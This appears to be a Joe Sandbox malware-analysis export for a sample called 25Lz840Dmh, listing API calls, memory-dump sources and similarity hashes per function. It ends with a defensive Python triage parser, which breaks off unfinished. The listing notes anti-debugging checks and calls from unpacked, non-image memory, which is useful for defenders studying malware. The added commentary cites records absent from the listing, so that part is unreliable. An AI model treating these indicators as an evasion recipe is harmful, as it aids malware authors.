                                                  • Instruction ID: 8a9362c9d51c19d040d9ac8a2b3d2b114bd2d8ce25822a32d2b57ade34ab2eb0
                                                  • Opcode Fuzzy Hash: 40a8ceac0f22b1a21b6e089d9f7c729e8ef1665c6ce72eee095c18a8037fd4dc
                                                  • Instruction Fuzzy Hash: 6581CBB0A15A408FC795EF39A84576D7BE9FB58306F54866AD018CB3B2EB704489CF14
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BF4370
                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BF4415
                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BF4432
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_$_memset
                                                  • String ID:
                                                  • API String ID: 1505330794-0
                                                  • Opcode ID: 5aa5097a95c519b93d3a09e6c0d53d19c35ebdc310dfbd86cb5fe008be01e0e4
                                                  • Instruction ID: 445e50a48ae0ed4fe2d478a215885d87e8320401d88b780dd8425049489ddd59
                                                  • Opcode Fuzzy Hash: 5aa5097a95c519b93d3a09e6c0d53d19c35ebdc310dfbd86cb5fe008be01e0e4
                                                  • Instruction Fuzzy Hash: 66318FB05057059FC720DF24D8847ABBBF8FB48309F000A6EF69A93251E770A948CB56
                                                  APIs
                                                  • __FF_MSGBANNER.LIBCMT ref: 00C15733
                                                    • Part of subcall function 00C1A16B: __NMSG_WRITE.LIBCMT ref: 00C1A192
                                                    • Part of subcall function 00C1A16B: __NMSG_WRITE.LIBCMT ref: 00C1A19C
                                                  • __NMSG_WRITE.LIBCMT ref: 00C1573A
                                                    • Part of subcall function 00C1A1C8: GetModuleFileNameW.KERNEL32(00000000,00CB33BA,00000104,?,00000001,00000000), ref: 00C1A25A
                                                    • Part of subcall function 00C1A1C8: ___crtMessageBoxW.LIBCMT ref: 00C1A308
                                                    • Part of subcall function 00C1309F: ___crtCorExitProcess.LIBCMT ref: 00C130A5
                                                    • Part of subcall function 00C1309F: ExitProcess.KERNEL32 ref: 00C130AE
                                                    • Part of subcall function 00C18B28: __getptd_noexit.LIBCMT ref: 00C18B28
                                                  • RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,00C10DD3,?), ref: 00C1575F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 1372826849-0
                                                  • Opcode ID: 9b2cb7593fd5a363d6d5973e50ce3578287b6dc54eee94c340d7e83fd769543c
                                                  • Instruction ID: 7600d7a132db5934b558f8a7e3bbebcaf583d0ead71260bc80e2db58224cbaa1
                                                  • Opcode Fuzzy Hash: 9b2cb7593fd5a363d6d5973e50ce3578287b6dc54eee94c340d7e83fd769543c
                                                  • Instruction Fuzzy Hash: 6801D235264A41EBD6112735AC83BEE73889BC3361F500529F429DA2D1DEB099C176A1
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C59548,?,?,?,?,?,00000004), ref: 00C598BB
                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C59548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C598D1
                                                  • CloseHandle.KERNEL32(00000000,?,00C59548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C598D8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleTime
                                                  • String ID:
                                                  • API String ID: 3397143404-0
                                                  • Opcode ID: b2b56a98d428b73fa10e07dca0dc39d1b1f3e6ed67d3376a876eeafe19169981
                                                  • Instruction ID: ed5f1c4d654939589b0c84815aa435a4f82bbb8a67e810228cc68737a62cddaa
                                                  • Opcode Fuzzy Hash: b2b56a98d428b73fa10e07dca0dc39d1b1f3e6ed67d3376a876eeafe19169981
                                                  • Instruction Fuzzy Hash: 10E08632141214F7EB211B64EC4AFDE7B59EB06761F104124FB28690F087B116529798
                                                  APIs
                                                  • _free.LIBCMT ref: 00C58D1B
                                                    • Part of subcall function 00C12D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C19A24), ref: 00C12D69
                                                    • Part of subcall function 00C12D55: GetLastError.KERNEL32(00000000,?,00C19A24), ref: 00C12D7B
                                                  • _free.LIBCMT ref: 00C58D2C
                                                  • _free.LIBCMT ref: 00C58D3E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                  • Instruction ID: 98217e8d3176639e6d6eb77039f98bb2b8d58c8c991d716a0506dc0d2927efeb
                                                  • Opcode Fuzzy Hash: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                  • Instruction Fuzzy Hash: 98E0C2A560160282CB20B678F840AD313FC4F48353744080DB81DE7182CE60F8CAE028
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CALL
                                                  • API String ID: 0-4196123274
                                                  • Opcode ID: ee4137c279873256d3c4a9bc979f6250dfb288d3ef5eb7686761de1f9bccc3a6
                                                  • Instruction ID: 74c98db8998f18de83fbf636e76e49fa43d61f7aa8a5502005d27caffea9cfce
                                                  • Opcode Fuzzy Hash: ee4137c279873256d3c4a9bc979f6250dfb288d3ef5eb7686761de1f9bccc3a6
                                                  • Instruction Fuzzy Hash: 2D2269B4508209DFC728DF14C490B6AB7E1FF45304F1489ADE99A8B362D771ED89DB82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID: EA06
                                                  • API String ID: 4104443479-3962188686
                                                  • Opcode ID: 900f1b1fa4dd75426282d7606924f69e81baab48fa2a54970e1924cd46ed2e31
                                                  • Instruction ID: 2b91bb7ba11b32af8417744f2666822c2d5eea869a06f51701451d9795d47f40
                                                  • Opcode Fuzzy Hash: 900f1b1fa4dd75426282d7606924f69e81baab48fa2a54970e1924cd46ed2e31
                                                  • Instruction Fuzzy Hash: 46417C35A0415C67DF259B6488917BF7FE6DB46300F2844F4EF869B282D7308E4C83A1
                                                  APIs
                                                  • IsThemeActive.UXTHEME ref: 00BF4834
                                                    • Part of subcall function 00C1336C: __lock.LIBCMT ref: 00C13372
                                                    • Part of subcall function 00C1336C: DecodePointer.KERNEL32(00000001,?,00BF4849,00C47C74), ref: 00C1337E
                                                    • Part of subcall function 00C1336C: EncodePointer.KERNEL32(?,?,00BF4849,00C47C74), ref: 00C13389
                                                    • Part of subcall function 00BF48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00BF4915
                                                    • Part of subcall function 00BF48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BF492A
                                                    • Part of subcall function 00BF3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BF3B68
                                                    • Part of subcall function 00BF3B3A: IsDebuggerPresent.KERNEL32 ref: 00BF3B7A
                                                    • Part of subcall function 00BF3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CB52F8,00CB52E0,?,?), ref: 00BF3BEB
                                                    • Part of subcall function 00BF3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00BF3C6F
                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BF4874
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                  • String ID:
                                                  • API String ID: 1438897964-0
                                                  • Opcode ID: e04b2277201a20b91797f58f901ffb31544c783a70c69e8413d3ff1fddd1a58f
                                                  • Instruction ID: 56c8e53312f6916b8c500e0b92445fb40467d3aac56fc261219a3f8363aae84d
                                                  • Opcode Fuzzy Hash: e04b2277201a20b91797f58f901ffb31544c783a70c69e8413d3ff1fddd1a58f
                                                  • Instruction Fuzzy Hash: 79119A719087459FC700EF28E845B1EBBE8EF99790F104A5EF154932B1DBB09A49CF92
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00BF5821,?,?,?,?), ref: 00BF5CC7
                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00BF5821,?,?,?,?), ref: 00C2DD73
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: e3b0a4f2e50b24c31b59389126e6c7e459b2aeef5ac72826192dcd21cd2edfd0
                                                  • Instruction ID: 6c1cc80fe8ce5cfa0fc55561fe910456b58f4f42aa23063e837a2d4a56e91ab9
                                                  • Opcode Fuzzy Hash: e3b0a4f2e50b24c31b59389126e6c7e459b2aeef5ac72826192dcd21cd2edfd0
                                                  • Instruction Fuzzy Hash: 9F018470144748BEF7304E25CC8AF7636DCEB01768F108359FBE69A1E0C6B41C898B50
                                                  APIs
                                                    • Part of subcall function 00C1571C: __FF_MSGBANNER.LIBCMT ref: 00C15733
                                                    • Part of subcall function 00C1571C: __NMSG_WRITE.LIBCMT ref: 00C1573A
                                                    • Part of subcall function 00C1571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,00C10DD3,?), ref: 00C1575F
                                                  • std::exception::exception.LIBCMT ref: 00C10DEC
                                                  • __CxxThrowException@8.LIBCMT ref: 00C10E01
                                                    • Part of subcall function 00C1859B: RaiseException.KERNEL32(?,?,?,00CA9E78,00000000,?,?,?,?,00C10E06,?,00CA9E78,?,00000001), ref: 00C185F0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 3902256705-0
                                                  • Opcode ID: c7ef491220118365fc9c9621a9f0a4bfe36b6940f9db40b0a32fb5796c39ed62
                                                  • Instruction ID: 66543a2782feae4d9cca58317fee37813c29de93fe6d5c1cbd21a00c08c3cd72
                                                  • Opcode Fuzzy Hash: c7ef491220118365fc9c9621a9f0a4bfe36b6940f9db40b0a32fb5796c39ed62
                                                  • Instruction Fuzzy Hash: A1F0F47180421E66CB10BA94EC069DE7BECDF03314F20042AF81496281DFB0AAC4F2D5
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __lock_file_memset
                                                  • String ID:
                                                  • API String ID: 26237723-0
                                                  • Opcode ID: f6c766eb3ad0243b79ff6d04953f84e3de96b2cbb4bcbf26c543b086eb3e25a2
                                                  • Instruction ID: befd608fdeb20a42d2195f544e6d097ce2ebfe79e97688cd0cc5ee43bd013bcd
                                                  • Opcode Fuzzy Hash: f6c766eb3ad0243b79ff6d04953f84e3de96b2cbb4bcbf26c543b086eb3e25a2
                                                  • Instruction Fuzzy Hash: 42016271801A09EBCF12AF69DC068DE7B61AFD3361F548115F8245A291DB318AE1FFD1
                                                  APIs
                                                    • Part of subcall function 00C18B28: __getptd_noexit.LIBCMT ref: 00C18B28
                                                  • __lock_file.LIBCMT ref: 00C153EB
                                                    • Part of subcall function 00C16C11: __lock.LIBCMT ref: 00C16C34
                                                  • __fclose_nolock.LIBCMT ref: 00C153F6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                  • String ID:
                                                  • API String ID: 2800547568-0
                                                  • Opcode ID: f5a67abfce431a3bb4baf262a4ed8c0d493b91820b27020d04bc2161a6953406
                                                  • Instruction ID: 101c828feb27e93cdd803e22e03e080186cf56434a47f2a91857e5456d96e713
                                                  • Opcode Fuzzy Hash: f5a67abfce431a3bb4baf262a4ed8c0d493b91820b27020d04bc2161a6953406
                                                  • Instruction Fuzzy Hash: 02F09631904A05DAD710AB6598017ED76A06F83375F648104A434AB1D1CBFC99C5BB51
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00BF542F,?,?,?,?,?), ref: 00BF807A
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00BF542F,?,?,?,?,?), ref: 00BF80AD
                                                    • Part of subcall function 00BF774D: _memmove.LIBCMT ref: 00BF7789
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$_memmove
                                                  • String ID:
                                                  • API String ID: 3033907384-0
                                                  • Opcode ID: 83d6f1732105827a19cd41509c9b54ed13b15851384ec3b6d1a3734396b5a1d5
                                                  • Instruction ID: de5d6fef3a0f162318ec20b9e19c6871b779dff2719a9b5c35736ef07127be99
                                                  • Opcode Fuzzy Hash: 83d6f1732105827a19cd41509c9b54ed13b15851384ec3b6d1a3734396b5a1d5
                                                  • Instruction Fuzzy Hash: 6F01A271205108BFEB246A26DC86FBF3BADEF86360F10807AFA05DE190DE6098449661
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a9630d1b62f068aa62a100b437449d154ed03e9b4e93e343d55009f54aac5c57
                                                  • Instruction ID: dc5a70a4c8f9033a7e60bea2ad152a626ade5be1552ec5c2a3efcfb95006188a
                                                  • Opcode Fuzzy Hash: a9630d1b62f068aa62a100b437449d154ed03e9b4e93e343d55009f54aac5c57
                                                  • Instruction Fuzzy Hash: C5619B7060020A9FCB24EF64C881ABBB7F5EF05304F2484BDEA1697291D771EE99DB50
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b193d7f738439b4d52c6834a480a147c8f3adef3c378423884a3e6c684792985
                                                  • Instruction ID: 4facc3c2ad4439ebf45b7a33db875ed99edfa197020fa89475aee7b529aec5fc
                                                  • Opcode Fuzzy Hash: b193d7f738439b4d52c6834a480a147c8f3adef3c378423884a3e6c684792985
                                                  • Instruction Fuzzy Hash: 45518130600608AFCF14EF64C995EBE77E6AF45314F1481A8FA169B392DB30EE05DB51
                                                  APIs
                                                    • Part of subcall function 022808E0: GetFileAttributesW.KERNELBASE(?), ref: 022808EB
                                                  • CreateDirectoryW.KERNELBASE(?,00000000), ref: 022811D5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AttributesCreateDirectoryFile
                                                  • String ID:
                                                  • API String ID: 3401506121-0
                                                  • Opcode ID: 041a6d9bee587e651485e9943635e73f1913fa2043e4ff1c33889d309e21eeed
                                                  • Instruction ID: f755a8a477c4dcb2ddfeeaca869799e6a5c73da83234bd568975744bc1ff95ee
                                                  • Opcode Fuzzy Hash: 041a6d9bee587e651485e9943635e73f1913fa2043e4ff1c33889d309e21eeed
                                                  • Instruction Fuzzy Hash: BC518131A2021896EF14EFA0D844BEE737AEF58300F004569E60DE72C4EB759B95CB66
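The records above are the sandbox's function-level export: each function is listed with the APIs it reaches (directly, or through a "Part of subcall function" line), the memory dump it was lifted from together with a "based on PE" flag, and the similarity identifiers. Reading hundreds of them by hand is slow, so the script below, an added example written for this report and not Joe Sandbox code, parses the records into structured data and pulls out the two things a triage analyst wants first: API calls made from a region the sandbox could not tie to a mapped PE image (in this report the 02280000 region, "based on PE: false", calling GetFileAttributesW and CreateDirectoryW, i.e. code that was unpacked or injected rather than loaded from the sample's image), and literal strings recovered from API arguments (the ">>>AUTOIT NO CMDEXECUTE<<<" passed to LoadLibraryExW further down agrees with the "compiled AutoIt script" verdict in the signatures). Assumptions: every record ends at its "Instruction Fuzzy Hash" line, and the sandbox prints constants as eight hex digits; the sample input is three records copied from this page.

```python
"""Parse the function-level records above (the APIs / Memory Dump Source /
Similarity blocks exported by Joe Sandbox) and flag API calls made from memory
the sandbox could not tie to a mapped PE image. Added example for this report,
not Joe Sandbox code. Assumption: each record ends at its "Instruction Fuzzy
Hash" line; sandbox-computed IDs and hashes are kept as opaque strings."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: three records copied from the listing on this page, trimmed.
SAMPLE = """\
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00BF542F,?,?,?,?,?), ref: 00BF807A
  • Part of subcall function 00BF774D: _memmove.LIBCMT ref: 00BF7789
• Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
• API ID: ByteCharMultiWide$_memmove
• String ID:
• API String ID: 3033907384-0
• Instruction Fuzzy Hash: 6F01A271205108BFEB246A26DC86FBF3BADEF86360F10807AFA05DE190DE6098449661
APIs
  • Part of subcall function 022808E0: GetFileAttributesW.KERNELBASE(?), ref: 022808EB
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 022811D5
• Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
• API ID: AttributesCreateDirectoryFile
• API String ID: 3401506121-0
• Instruction Fuzzy Hash: BC518131A2021896EF14EFA0D844BEE737AEF58300F004569E60DE72C4EB759B95CB66
APIs
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BF4E0F
  • Part of subcall function 00BF4B6A: FreeLibrary.KERNEL32(00000000), ref: 00BF4BA4
• Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
• API ID: Library$Free$Load__wfsopen_memmove
• API String ID: 1396898556-0
• Instruction Fuzzy Hash: 6C11E735600209EBCF14AF74C852FBF77E4AF44710F1088ADF646A7192DB719A09AB51
"""

# "<name>.<module>(<args>), ref: <addr>", optionally prefixed by the subcall marker.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(
    r"^Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
FIELD_RE = re.compile(
    r"^(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|Opcode Fuzzy Hash|"
    r"Instruction Fuzzy Hash|Snapshot File): ?(?P<value>.*)$")
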